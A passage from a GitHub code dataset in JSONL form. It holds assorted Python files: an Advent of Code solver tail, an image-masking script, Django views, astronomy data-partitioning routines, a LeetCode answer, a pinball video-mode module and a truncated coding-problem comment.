grid\n\n\ndef find_next_area(grid, pos, known_cells):\n new_positions = [{\"id\": d[0], \"pos\": new_pos(pos, d[1])} for d in directions.items()]\n idx = [x for x in new_positions if x[\"pos\"] not in grid]\n if len(idx) > 0:\n return idx[0][\"id\"]\n\n least_visited_cells = 10000 # arbitrary high number\n least_visited = {}\n\n not_blocked_positions = [x for x in new_positions if grid[x[\"pos\"]] != \"#\"]\n for i in not_blocked_positions:\n if least_visited_cells > known_cells[i[\"pos\"]]:\n least_visited_cells = known_cells[i[\"pos\"]]\n least_visited = i\n return least_visited[\"id\"]\n\n\ndef fill_oxygen(grid, target, time, total):\n new_positions = [new_pos(target, d) for d in directions.values()]\n for pos in new_positions:\n if grid[pos] == MOVE:\n grid[pos] = OXYGEN\n total = fill_oxygen(grid, pos, time + 1, total)\n return max(time, total)\n\n\ndef get_input_file():\n requests_cache.install_cache('../cache')\n path = os.path.abspath(__file__).split('/')\n url = 'https://adventofcode.com/' + path[-3] + '/day/' + path[-2] + '/input'\n lines = requests.get(url, cookies={\"session\": os.environ['SESSION']}).text.strip().split(\",\")\n return lines\n\n\ndef main():\n lines = get_input_file()\n instruction = [int(x) for x in lines]\n\n print(part1(instruction))\n print(part2(instruction))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"lnyman1/adventofcode2019","sub_path":"2019/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"34704194732","text":"import os\nimport time\n\nimport cv2\nimport numpy as np\n\ntime_start = time.time()\n\ncampaigns = [\n \"2000_ARM\",\n \"2002_CRYSTAL-FACE-NASA\",\n \"2002_CRYSTAL-FACE-UND\",\n \"2003_AIRS_II\",\n \"2004_Midcix\",\n \"2007_ICE_L\",\n \"MPACE\",\n]\nfor campaign in campaigns:\n print(campaign)\n rootdir = \"../cpi_data/campaigns/\" + campaign + \"/good_lowcutoff/\"\n savedir = \"../cpi_data/campaigns/\" + campaign + \"/masked_background/\"\n for subdir, dirs, files in os.walk(rootdir):\n\n for file in files:\n\n image_og = cv2.imread(os.path.join(subdir, file), cv2.IMREAD_UNCHANGED)\n image_og = cv2.cvtColor(image_og, cv2.COLOR_BGR2RGB)\n gray = cv2.cvtColor(image_og, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, 50, 255, cv2.THRESH_BINARY_INV)[1]\n\n # get largest contour\n contours, _ = cv2.findContours(\n thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE\n )\n # returns image, contours, hierarchy\n if len(contours) != 0:\n mask = np.zeros(image_og.shape[:2], dtype=\"uint8\")\n big_contour = max(contours, key=cv2.contourArea)\n draw = cv2.drawContours(mask, [big_contour], 0, (255, 255, 255), -1)\n\n final = cv2.bitwise_and(image_og, image_og, mask=mask)\n\n # save result\n direct = subdir.split(\"/\")[-1]\n if not os.path.exists(os.path.join(savedir, direct)):\n os.makedirs(os.path.join(savedir, direct), exist_ok=True)\n cv2.imwrite(os.path.join(savedir, direct, file), final)\n\n time_end = time.time() - time_start\n print(\"processed %s campaign in %d seconds\" % (campaign, time_end))\n","repo_name":"vprzybylo/cocpit","sub_path":"processing_scripts/mask_background_multcampaigns.py","file_name":"mask_background_multcampaigns.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"34139329631","text":"from django.shortcuts import render, render_to_response,RequestContext,redirect \nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.template.context import RequestContext\nfrom django.contrib.auth.models import User\n \nfrom .models import Alimento\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.forms import UserCreationForm,AuthenticationForm\nfrom django.contrib.auth import login, authenticate, logout\n#from BodyControl.apps.food.managers import Pasta\n\n\n@login_required()\ndef load_foods(request,estado_id):\n\tfoods = Alimento.objects.filter(estado=estado_id)\n\t#f = Pasta();\n\t#foods = Alimento.f.all()\n\t \n\treturn render(request, \"food/foods.html\", {'foods':foods})\n\n@login_required()\ndef add(request):\n if request.POST:\n form = Estado(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n return redirect(reverse(\"home\"))\n else:\n form = Estado()\n return render(request, \"status/add_status.html\", {'form_status':form})\n@login_required()\ndef edit(request,food_id):\n if request.POST:\n form = Estado(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.save()\n return redirect(reverse(\"home\"))\n else:\n form = Estado()\n return render(request, \"status/add_status.html\", {'form_status':form})\n \n@login_required()\ndef delete(request,food_id):\n if request.POST:\n form = Estado(request.POST)\n if form.is_valid(): \n post = form.save(commit=False)\n post.save()\n return redirect(reverse(\"home\"))\n else:\n form = Estado()\n return render(request, \"status/add_status.html\", {'form_status':form})","repo_name":"leoarequipa/BodyControlDjango","sub_path":"BodyControl/apps/food/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"2874785706","text":"from django.core.exceptions import BadRequest\nfrom django.http import HttpRequest, HttpResponse, JsonResponse\n\nfrom .exceptions import PoisonException\nfrom .messages import (\n CreateGameRequest,\n CreatePlayerRequest,\n JoinGameRequest,\n PerformActionRequest,\n PollGameRequest,\n StartGameRequest\n)\nfrom .models import Game, Player\nfrom . import game\n\n\ndef error_handler(f):\n def wrapper(*args):\n try:\n return f(*args)\n except PoisonException as e:\n return e.to_response()\n return wrapper\n\n\ndef index(request):\n # type: (HttpRequest) -> HttpResponse\n return HttpResponse(\"Web-app here\")\n\n\n@error_handler\ndef create_player(request):\n # type: (HttpRequest) -> JsonResponse\n\n req = CreatePlayerRequest(request.body)\n player = Player(name=req.name)\n player.save()\n\n return JsonResponse({'id': player.key})\n\n\n@error_handler\ndef create_game(request):\n # type: (HttpRequest) -> JsonResponse\n\n req = CreateGameRequest(request.body)\n g = game.create_game(req.player_id)\n \n return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef join_game(request):\n # type: (HttpRequest) -> JsonResponse\n\n req = JoinGameRequest(request.body)\n g = game.join_game(req.game_id, req.player_id)\n return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef start_game(request):\n # type: (HttpRequest) -> JsonResponse\n\n req = StartGameRequest(request.body)\n g = game.start_game(req.game_id, req.player_id)\n return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef poll_game(request):\n # type: (HttpRequest) -> JsonResponse\n\n req = PollGameRequest(request.body)\n try:\n g = Game.objects.get(pk=req.game_id)\n except Exception:\n raise BadRequest(f'Bad game id: {req.game_id}')\n\n return JsonResponse(game.encode_game(g, req.player_id))\n\n\n@error_handler\ndef perform_action(request):\n # type: (HttpRequest) -> JsonResponse\n\n req = PerformActionRequest(request.body)\n g = game.perform_action(req.game_id, req.player_id, req.kind, req.params)\n return JsonResponse(game.encode_game(g, req.player_id))\n","repo_name":"benreid24/Poison","sub_path":"server/poison/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3483548939","text":"#!/usr/bin/python\n\"\"\"Group bins and apply functions.\n\nA set of functions for grouping data on one or two dimensional bins and\nefficiently apply functions to resulting groups. To be used with Dask\ndelayed for multicore and distributed processing.\n\nTodo:\n * Rewrite as a couple of class instead of disjointed functions\n * Add error checking\n * Fix index problem at row 0 and -1\n * Implement sparse arrays for 2D bin grid\n\"\"\"\n\nimport numpy as np\nimport numba as nb\nfrom numba import literal_unroll\n\nimport dask.array as da\nimport xarray as xr\n\nfrom dask.array.core import slices_from_chunks\n\nfrom .annulus_stats import median_absolute_deviation\n\n# @nb.jit(nopython=False, cache=True)\ndef sort_bins(uvbins, values, flags=None):\n \"\"\" Sort the input array with respect to the u and v bin indicies. We use \n lexsort which is not an currently implemented in numba.\n\n Parameters\n ----------\n uvbins : int64 array of size (npoints, 3)\n A numpy array with three columns for u and v bin indicies and ms index.\n values : float32 array of size (npoints, 1)\n A one-dimensional value array. \n flags (optional) : boolean array of size (npoints)\n An array of existing flags from MS file.\n\n Returns\n -------\n uvbins, values \n Sorted input array of same name\n \"\"\"\n idx = np.lexsort(np.array([uvbins[:,1], uvbins[:,0]])) # no numba type for np.lexsort, either use nopython=False or fix lexsort implementation included below \n uvbins = uvbins[idx]\n values = values[idx]\n\n if not flags is None:\n flags = flags[idx]\n # Find indicies of rows to keep\n flg_idx = np.where(flags==False)\n print(\"MS file flags:\\t Removed {:.2f}% - {}/{} rows.\".format( \n 100*(len(flags) - len(flg_idx[0]))/len(flags), (len(flags) - len(flg_idx[0])), len(values))\n )\n values = values[flg_idx]\n uvbins = uvbins[flg_idx]\n\n null_flags = uvbins[np.where(values==0)]\n\n uvbins = uvbins[np.where(values!=0)]\n print(\"Zero values:\\t Removed {:.2f}% - {}/{} rows.\".format(\n 100*len(null_flags)/float(len(values)), len(null_flags), len(values))\n )\n\n values = values[np.where(values!=0)]\n\n return uvbins, values, null_flags[:,2]\n\n\n# @nb.jit(nopython=False)\ndef sort_bins_multi(uvbins, values, flags=None):\n idx = np.lexsort(np.array([uvbins[:,1], uvbins[:,0]])) # no numba type for np.lexsort, either use nopython=False or fix lexsort implementation included below \n uvbins = uvbins[idx]\n values = values[idx]\n\n if not flags is None:\n flags = flags[idx]\n # Find indicies of rows to keep\n flg_idx = np.where(flags==False)\n print(\"MS file flags:\\t Removed {:.2f}% - {}/{} rows.\".format( \n 100*(len(flags) - len(flg_idx[0]))/len(flags), (len(flags) - len(flg_idx[0])), len(values))\n )\n values = values[flg_idx]\n uvbins = uvbins[flg_idx]\n\n # Filter rows with zero values (often this is done by pre-flagging)\n null_idx = np.where(np.sum(values, axis=1)==0.)\n pos_idx = np.where(np.sum(values, axis=1)!=0.)\n null_flags = uvbins[null_idx]\n\n uvbins = uvbins[pos_idx]\n print(\"Zero values:\\t Removed {:.2f}% - {}/{} rows.\".format(\n 100*len(null_flags)/float(len(values)), len(null_flags), len(values))\n )\n values = values[pos_idx]\n\n return uvbins, values, null_flags[:,2]\n\n\n\n# @nb.njit(\n# nb.types.Tuple(\n# (nb.int64[:,::1], nb.float32[:,::1], nb.int64[:,::1], nb.int64[::1])\n# )(nb.int64[:,::1], nb.float32[:,::1], nb.int64[::1]),\n# locals={\n# \"ubin_prev\": nb.int64,\n# \"vbin_prev\": nb.int64,\n# \"k\": nb.uint32\n# },\n# nogil=True\n# )\n@nb.njit(nogil=True)\ndef create_bin_groups_sort(uvbins, values, null_flags):\n \"\"\"\n Sort U and V bins for a partition of a dataset such that uv bins are contiguous \n in the datset. Return sorted data arrays for the bins, indicies, and values \n and a corresponding mapping of uv bins to indexical positions in these arrays. \n Allows for contiguous and pre-computable memory allocations for the data.\n \n Parameters\n ----------\n uvbins : dask.array\n A dask array with three columns: u and v bins and index for one partition.\n values : dask.array\n A dask array with visibility values corresponding to the uvbins rows.\n null_flags :\n List of indicies for rows with zero value, this is passed through without change.\n \n Returns\n -------\n uvbins: np.array\n A sorted array with u and v bins and indicies.\n values:\n A sorted array with values.\n grid_row_map:\n A tuple with one row for each unique UV bin pair and its starting index in the \n uvbins and values arrays.\n null_flags:\n List of indicies for rows with zero value.\n \"\"\"\n \n # Return a null set if all values in the sub-grid have been removed already\n if len(uvbins) == 0:\n grid_row_map = np.array([[0, 0, 0], [-1, -1, 1]], dtype=np.int64)\n return uvbins, values, grid_row_map, null_flags\n\n\n ubin_prev, vbin_prev = uvbins[0][0], uvbins[0][1]\n grid_row_map = [[ubin_prev, vbin_prev, 0]]\n \n k = 0\n for row in uvbins:\n if ((row[0] != ubin_prev) | (row[1] != vbin_prev)):\n ubin_prev, vbin_prev = row[0], row[1]\n grid_row_map.append([ubin_prev, vbin_prev, k])\n k = k+1\n\n grid_row_map.append([-1, -1, len(uvbins)]) # Add the upper index for the final row\n grid_row_map = np.array(grid_row_map, dtype=np.int64)\n \n return uvbins, values, grid_row_map, null_flags\n\n\n@nb.njit(nogil=True)\ndef apply_grid_median(values, grid_row_map):\n \"\"\"\n Apply a function broadcasting across all values in each bin within a given \n partition. Operates on the output of the create_bin_groups_sort function.\n \n Parameters\n ----------\n values : np.array\n A sorted array with values.\n grid_row_map : np.array\n A tuple with one row for each unique UV bin pair and its starting index \n in the uvbins and values arrays.\n \n Returns\n -------\n function_grid : array-like\n A two dimensional array of uv bins with values of the given function \n applied to the bins.\n \"\"\"\n \n function_grid = np.zeros(((np.max(grid_row_map[:,0])+1), (np.max(grid_row_map[:,1])+1)), dtype=np.float32)\n\n print('Applying function to grid_map.')\n for i_bin, bin_location in enumerate(grid_row_map[:-1]):\n u, v = bin_location[:2]\n istart, iend = grid_row_map[i_bin][2], grid_row_map[i_bin+1][2]\n\n function_grid[u][v] = np.median(values[istart:iend])\n\n return function_grid\n\n\n@nb.njit(nogil=True)\ndef apply_grid_mad(values, grid_row_map):\n \"\"\"\n Apply a function broadcasting across all values in each bin within a given \n partition. Operates on the output of the create_bin_groups_sort function.\n \n Parameters\n ----------\n values : np.array\n A sorted array with values.\n grid_row_map : np.array\n A tuple with one row for each unique UV bin pair and its starting index \n in the uvbins and values arrays.\n \n Returns\n -------\n function_grid : array-like\n A two dimensional array of uv bins with values of the given function \n applied to the bins.\n \"\"\"\n function_grid = np.zeros(((np.max(grid_row_map[:,0])+1), (np.max(grid_row_map[:,1])+1)))\n\n print('Applying function to grid_map.')\n for i_bin, bin_location in enumerate(grid_row_map[:-1]):\n u, v = bin_location[:2]\n istart, iend = grid_row_map[i_bin][2], grid_row_map[i_bin+1][2]\n\n function_grid[u][v] = median_absolute_deviation(values[istart:iend])\n\n return function_grid\n \n\n# @nb.njit(nogil=True)\ndef apply_grid_function(values, grid_row_map, function):\n \"\"\"\n Apply a function broadcasting across all values in each bin within a given \n partition. Operates on the output of the create_bin_groups_sort function.\n \n Parameters\n ----------\n values : np.array\n A sorted array with values.\n grid_row_map : np.array\n A tuple with one row for each unique UV bin pair and its starting index \n in the uvbins and values arrays.\n func : function\n \n Returns\n -------\n function_grid : array-like\n A two dimensional array of uv bins with values of the given function applied to \n the bins.\n \"\"\"\n function_grid = np.zeros(((np.max(grid_row_map[:,0])+1), (np.max(grid_row_map[:,1])+1)))\n\n print('Applying function to grid_map.')\n for i_bin, bin_location in enumerate(grid_row_map[:-1]):\n u, v = bin_location[:2]\n istart, iend = grid_row_map[i_bin][2], grid_row_map[i_bin+1][2]\n\n function_grid[u][v] = function(values[istart:iend])\n\n return function_grid\n\n\n# @nb.jit(nopython=True, nogil=True, cache=True)\ndef combine_function_partitions(median_chunks):\n \"\"\"\n Combine a set of uv grid partitions in to a complete uv grid.\n \n Parameters\n ----------\n median_chunks : array-like\n A set of uv grids each containing values for mutually orthogonal \n partitions of the full grid.\n\n Returns\n -------\n function_grid : array-like \n \"\"\"\n dim1 = np.max(np.array([chunk.shape[0] for chunk in median_chunks], dtype=np.int32))\n dim2 = np.max(np.array([chunk.shape[1] for chunk in median_chunks], dtype=np.int32))\n\n function_grid = np.zeros((dim1, dim2))\n for k, chunk in enumerate(median_chunks):\n cshape = chunk.shape\n# print(f\"chunk: {k}, {cshape[0]}, {cshape[1]}\")\n# print(function_grid[:cshape[0],:cshape[1]].shape)\n function_grid[:cshape[0],:cshape[1]] += chunk\n return function_grid\n\n\n\n# ---------------------------------------------------------------------------------\n\ndef combine_annulus_results(median_grid_chunks, count_grid_chunks, flag_list_chunks, val_flag_chunks):\n '''Dask Delayed Function to concatinate chunked output data from annulus_stats functions.'''\n flag_list = np.concatenate(flag_list_chunks)\n val_flag_list = np.concatenate(val_flag_chunks)\n median_grid = combine_function_partitions(median_grid_chunks)\n count_grid = combine_function_partitions(count_grid_chunks)\n\n return flag_list, val_flag_list, median_grid, count_grid\n\n\n\n# ---------------------------------------------------------------------------------\n\n\n\n#@nb.njit(\n# nb.types.Tuple(\n# (nb.int32, nb.int32[::1], nb.int32[::1], nb.float32[:], nb.boolean[::1], nb.int64[::1])\n# )(nb.int32[::1], nb.int32[::1], nb.float32[:], nb.boolean[::1], nb.int64[::1], nb.float64),\n# locals={\n# \"i\": nb.uint32,\n# \"j\": nb.uint32,\n# \"v_tmp\": nb.float32[::1]\n# },\n# nogil=True\n#)\n@nb.njit(nogil=True, cache=True)\ndef partition_permutation(a, b, v, f, p, pivot):\n ''' Apply a partition to the first input array using the pivot point, p and \n sort all the input arrays according to this partial sort.\n\n Parameters\n ----------\n a, b: array of int32 of shape (npoints)\n Either u or v bins \n v: array float32 (npoints)\n Representation of visibility data such as amplitude, real, imaginary, \n etc. - one dimensional\n p: array of int64 (npoints)\n Indicies corresponding to the order in the source measurement set for inverting.\n pivot: int32\n Pivot point to use for partial sort - all points lesser or equal with be \n in the first part of the array.\n\n Returns\n -------\n i: int32\n The index position of the output arrays where the pivot exists.\n a, b, v, f, p\n The partially sorted input arrays\n '''\n\n i = 0\n for j in range(len(a)):\n if a[j] <= pivot:\n a[i], a[j] = a[j], a[i]\n b[i], b[j] = b[j], b[i]\n v[i], v[j] = v[j], v[i]\n f[i], f[j] = f[j], f[i]\n p[i], p[j] = p[j], p[i]\n i += 1\n\n return i, a, b, v, f, p\n \n\n@nb.njit(\n nb.types.Tuple(\n (nb.int32, nb.int32[::1], nb.int32[::1], nb.float32[:,::1], nb.boolean[::1], nb.int64[::1])\n )(nb.int32[::1], nb.int32[::1], nb.float32[:,::1], nb.boolean[::1], nb.int64[::1], nb.float64),\n locals={\n \"i\": nb.uint32,\n \"j\": nb.uint32,\n \"v_tmp\": nb.float32[::1]\n },\n nogil=True\n)\ndef partition_permutation_multi(a, b, v, f, p, pivot):\n ''' Apply a partition to the first input array using the pivot point, p and \n sort all the input arrays according to this partial sort.\n\n Parameters\n ----------\n a, b: array of int32 of shape (npoints)\n Either u or v bins \n v: array float32 (npoints, npol)\n Representation of visibility data such as amplitude, real, imaginary, \n etc. - two dimensional to allow for multiple polarization states.\n p: array of int64 (npoints)\n Indicies corresponding to the order in the source measurement set for inverting.\n pivot: int32\n Pivot point to use for partial sort - all points lesser or equal with be \n in the first part of the array.\n\n Returns\n -------\n i: int32\n The index position of the output arrays where the pivot exists.\n a, b, v, p\n The partially sorted input arrays\n '''\n\n i = 0\n for j in range(len(a)):\n if a[j] <= pivot:\n a[i], a[j] = a[j], a[i]\n b[i], b[j] = b[j], b[i]\n\n v_tmp = v[i].copy()\n v[i] = v[j]\n v[j] = v_tmp\n\n f[i], f[j] = f[j], f[i]\n p[i], p[j] = p[j], p[i]\n i += 1\n\n return i, a, b, v, f, p\n\n","repo_name":"idia-astro/gridflag","sub_path":"gridflag/groupby_partition.py","file_name":"groupby_partition.py","file_ext":"py","file_size_in_byte":13559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"2197072581","text":"class Solution:\n def smallerNumbersThanCurrent(self, nums: List[int]) -> List[int]:\n hash_list = [0] * 101\n for n in nums:\n hash_list[n] += 1\n\n sum_list = [0] * 100\n the_sum = 0\n for n in range(100):\n the_sum += hash_list[n]\n sum_list[n] = the_sum\n\n result = []\n for n in nums:\n if n == 0:\n result.append(0)\n else:\n result.append(sum_list[n - 1])\n\n return result","repo_name":"willcoderwang/leetcode","sub_path":"1365.py","file_name":"1365.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"42071103889","text":"s = input() #строка\r\n# находим остатки при делении на 4\r\n# это могут быть числа 3, 2, 1, 0\r\n# в новую строку добавляем начало текущей строки равное остатку\r\nif len(s)% 4 == 1:\r\n d = s[0] + ' '\r\n a = 1 # коэффициент для корректировки начала цикла\r\nif len(s)% 4 == 2:\r\n d = s[0] + s[1]+ ' '\r\n a = 1\r\nif len(s)% 4 == 3:\r\n d = s[0] + s[1]+ s[2] + ' '\r\n a = 1\r\nif len(s)% 4 == 0:\r\n d = ''\r\n a = 0\r\n\r\nfor x in range(len(d)-a,len(s)-3,4):\r\n d = d+ s[x]+ s[x+1]+s[x+2]+s[x+3]+ ' '\r\nprint(d)","repo_name":"liva2/yandex_book","sub_path":"tetradi.py","file_name":"tetradi.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"24543354406","text":"from random import randint, shuffle\nfrom procgame.dmd import ExpandTransition, Frame, FrameLayer, GroupedLayer, ScriptedLayer, TextLayer\nfrom procgame.game import Mode, SwitchStop\n\nclass ShootingGallery(Mode):\n def __init__(self, game, priority, video_mode_setting):\n super(ShootingGallery, self).__init__(game, priority)\n self.on_complete = None\n\n if video_mode_setting == 'cow':\n # family friendly option\n self.enemy_text = 'Shoot mean cows'\n self.friend_text = 'Do NOT shoot nice cows'\n self.bad_guy_shot = 'moo'\n cows_anim = self.game.animations['cows']\n image_frames = cows_anim.frames[0].create_frames_from_grid(2, 1)\n self.all_friends = [image_frames[0]] * 4\n self.all_enemies = [image_frames[1]] * 4\n else:\n # default option\n self.enemy_text = 'Shoot enemies'\n self.friend_text = 'Do NOT shoot friends'\n self.bad_guy_shot = 'bad guy shot'\n gallery_anim = self.game.animations['jdpeople']\n image_frames = gallery_anim.frames[0].create_frames_from_grid(6, 2)\n self.all_enemies = image_frames[0:6]\n self.all_friends = image_frames[6:12]\n\n self.scope_frames = self.game.animations['scopeandshot'].frames[0:4]\n self.shot_frames = self.game.animations['scopeandshot'].frames[4:8]\n\n def mode_started(self):\n self.success = False\n self.state = 'intro'\n self.scope_pos = 0\n self.num_enemies = 0\n self.num_enemies_shot = 0\n self.speed_factor = 1\n self.targets = ['empty'] * 4\n self.available_friends = self.all_friends[:]\n self.available_enemies = self.all_enemies[:]\n shuffle(self.available_friends)\n shuffle(self.all_enemies)\n self.intro()\n\n def intro(self):\n self.game.enable_flippers(False)\n font_large = self.game.fonts['large']\n font_medium = self.game.fonts['medium']\n\n self.status_layer = TextLayer(128/2, 7, font_large, 'center', opaque=False).set_text('Video Mode')\n\n self.intro_layer_0 = GroupedLayer(128, 32, [self.status_layer])\n\n self.intro_layer_11 = TextLayer(128/2, 7, font_medium, 'center').set_text(self.enemy_text)\n self.intro_layer_12 = TextLayer(128/2, 17, font_medium, 'center').set_text(self.friend_text)\n self.intro_layer_1 = GroupedLayer(128, 32, [self.intro_layer_11, self.intro_layer_12])\n\n self.intro_layer_21 = TextLayer(128/2, 7, font_medium, 'center').set_text('Flipper buttons aim')\n self.intro_layer_22 = TextLayer(128/2, 17, font_medium, 'center').set_text('Fire buttons shoot')\n self.intro_layer_2 = GroupedLayer(128, 32, [self.intro_layer_21, self.intro_layer_22])\n\n self.layer = ScriptedLayer(128, 32, [\n {'seconds':3.0, 'layer':self.intro_layer_0},\n {'seconds':3.0, 'layer':self.intro_layer_1},\n {'seconds':3.0, 'layer':self.intro_layer_2}])\n\n self.layer.on_complete = self.start\n\n def start(self):\n self.state = 'active'\n self.status_layer.set_text('')\n\n self.target_layers = [self.new_frame_layer(True) for unused in range(0, 4)]\n self.scope_layer = self.new_frame_layer()\n self.bullet_layers = [self.new_frame_layer() for unused in range(0, 4)]\n self.result_layer = TextLayer(128/2, 20, font_medium, 'center', opaque=False)\n\n all_layers = self.target_layers + [self.scope_layer] + self.bullet_layers + [self.status_layer, self.result_layer]\n self.layer = GroupedLayer(128, 32, all_layers)\n\n # Add the first target after 1 second.\n self.delay(name='add_target', event_type=None, delay=1, handler=self.add_target)\n self.update_scope_pos()\n\n def new_frame_layer(self, transition=False):\n frame_layer = FrameLayer()\n frame_layer.composite_op = 'blacksrc'\n if transition:\n frame_layer.transition = ExpandTransition()\n return frame_layer\n\n def add_target(self):\n if self.num_enemies == 15:\n self.delay(name='finish', event_type=None, delay=2.0, handler=self.finish)\n else:\n # speed up after the first 3 enemies shown, afterwards speed up after every 4 enemies shown\n if self.speed_factor < 5 and self.num_enemies == 4 * self.speed_factor - 1:\n self.speed_factor += 1\n\n # Find the first empty position starting with the random start_index.\n start_index = randint(0, 3)\n for i in range(0, 3):\n position = (i + start_index) % 4\n if self.targets[position] == 'empty':\n target_type = randint(0, 1)\n if target_type:\n self.show_enemy(position)\n else:\n self.show_friend(position)\n self.delay(name='remove_target', event_type=None, delay=3.0-(self.speed_factor * 0.4), handler=self.remove_target, param=position)\n break\n\n # Add a new target after a short delay\n self.delay(name='add_target', event_type=None, delay=2.0-(self.speed_factor*0.3), handler=self.add_target)\n\n def show_friend(self, position):\n self.show_target(position, 'friend', self.available_friends)\n\n def show_enemy(self, position):\n self.num_enemies += 1\n self.show_target(position, 'enemy', self.available_enemies)\n\n def show_target(self, position, target_type, available_targets):\n self.bullet_layers[position].frame = None # remove empty shot if applicable\n # We never show the same friend or enemy on the screen more than once\n self.targets[position] = target_type\n target_frame = available_targets.pop()\n new_frame = Frame(128, 32)\n Frame.copy_rect(dst=new_frame, dst_x=position*32, dst_y=0, src=target_frame, src_x=0, src_y=0, width=32, height=32, op='blacksrc')\n self.target_layers[position].original_frame = target_frame\n self.target_layers[position].frame = new_frame\n self.target_layers[position].transition.in_out = 'in'\n self.target_layers[position].transition.start()\n\n def remove_target(self, position):\n # Only remove if it hasn't been shot.\n # If it has been shot, it will be removed later.\n if self.targets[position] != 'shot' and self.state == 'active':\n self.make_available(position)\n self.target_layers[position].transition.in_out = 'out'\n self.target_layers[position].transition.start()\n\n def make_available(self, position):\n available_targets = self.available_friends if self.targets[position] == 'friend' else self.available_enemies\n available_targets.append(self.target_layers[position].original_frame)\n shuffle(available_targets)\n self.targets[position] = 'empty'\n\n def sw_flipperLwL_active(self, sw):\n self.flipper_active(-1)\n\n def sw_flipperLwR_active(self, sw):\n self.flipper_active(1)\n\n def flipper_active(self, pos_delta):\n if self.state == 'intro':\n # skip the intro\n self.start()\n elif self.state == 'active':\n new_pos = self.scope_pos + pos_delta\n if 0 <= new_pos <= 3:\n self.scope_pos = new_pos\n self.update_scope_pos()\n\n def update_scope_pos(self):\n self.scope_layer.frame = self.scope_frames[self.scope_pos]\n\n def sw_fireL_active(self, sw):\n self.fire_active()\n return SwitchStop\n\n def sw_fireR_active(self, sw):\n self.fire_active()\n return SwitchStop\n\n def fire_active(self):\n if self.state == 'intro':\n # skip the intro\n self.start()\n elif self.state == 'active':\n self.shoot()\n\n def shoot(self):\n self.bullet_layers[self.scope_pos].frame = self.shot_frames[self.scope_pos]\n if self.targets[self.scope_pos] == 'enemy':\n self.shoot_enemy(self.scope_pos)\n elif self.targets[self.scope_pos] == 'empty':\n self.delay(name='remove_empty_shot', event_type=None, delay=0.5, handler=self.remove_empty_shot, param=self.scope_pos)\n elif self.targets[self.scope_pos] == 'friend':\n self.shoot_friend()\n\n def shoot_enemy(self, position):\n self.num_enemies_shot += 1\n self.game.sound.play(self.bad_guy_shot)\n self.targets[position] = 'shot'\n self.result_layer.set_text('Good Shot', 1)\n self.delay(name='blink_enemy_shot', event_type=None, delay=1.5, handler=self.blink_enemy_shot, param=position)\n\n def blink_enemy_shot(self, position):\n self.target_layers[position].blink_frames = 2\n self.bullet_layers[position].blink_frames = 2\n self.delay(name='remove_enemy_shot', event_type=None, delay=1, handler=self.remove_enemy_shot, param=position)\n\n def remove_enemy_shot(self, position):\n self.make_available(position)\n self.target_layers[position].frame = None\n self.bullet_layers[position].frame = None\n self.target_layers[position].blink_frames = 0\n self.bullet_layers[position].blink_frames = 0\n\n def shoot_friend(self):\n self.game.sound.play('good guy shot')\n self.state = 'complete'\n self.status_layer.set_text('Failed')\n self.cancel_delayed(['add_target', 'remove_target', 'remove_empty_shot', 'blink_enemy_shot', 'remove_enemy_shot', 'finish'])\n self.delay(name='wrap_up', event_type=None, delay=2.0, handler=self.wrap_up)\n self.success = False\n\n def remove_empty_shot(self, position):\n # Make sure it's still empty\n if self.targets[position] == 'empty':\n self.bullet_layers[position].frame = None\n\n def finish(self):\n # the player reached the end of the round\n self.state = 'complete'\n self.cancel_delayed(['remove_target', 'remove_empty_shot', 'blink_enemy_shot', 'remove_enemy_shot'])\n self.intro_layer_21.set_text('Enemies Shot')\n self.intro_layer_22.set_text(str(self.num_enemies_shot) + ' of ' + str(self.num_enemies))\n self.layer = self.intro_layer_2\n self.delay(name='completion_bonus', event_type=None, delay=2.0, handler=self.completion_bonus)\n\n def completion_bonus(self):\n self.success = self.num_enemies_shot == self.num_enemies\n if self.success:\n self.game.sound.play('perfect')\n\n points = 100000 if self.success else 5000 * self.num_enemies_shot\n self.game.score(points)\n self.intro_layer_21.set_text('Perfect' if self.success else 'Completion Bonus')\n self.intro_layer_22.set_text(self.game.format_points(points))\n self.delay(name='wrap_up', event_type=None, delay=3.0, handler=self.wrap_up)\n\n def wrap_up(self):\n self.game.enable_flippers(True)\n if self.on_complete != None:\n self.on_complete(self.success)\n","repo_name":"clempo2/JD2-pyprocgame","sub_path":"my_modes/videomode.py","file_name":"videomode.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"1734675103","text":"# Daily Coding Problem #133\n# Problem\n# This problem was asked by Amazon.\n#\n# Given a node in a binary search tree, return the next bigger element, also known as the inorder successor.\n#\n# For example, the inorder successor of 22 is 30.\n#\n# 10\n# / \\\n# 5 30\n# / \\\n# 22 35\n# You can assume each node has a parent pointer.\n#\n# Solution\n# We can use case-analysis to break the problem down to two steps.\n#\n# First, if there is a right child of node, then the leftmost descendant of node.right (or just node.right if it has\n# none) is simply the inorder successor. 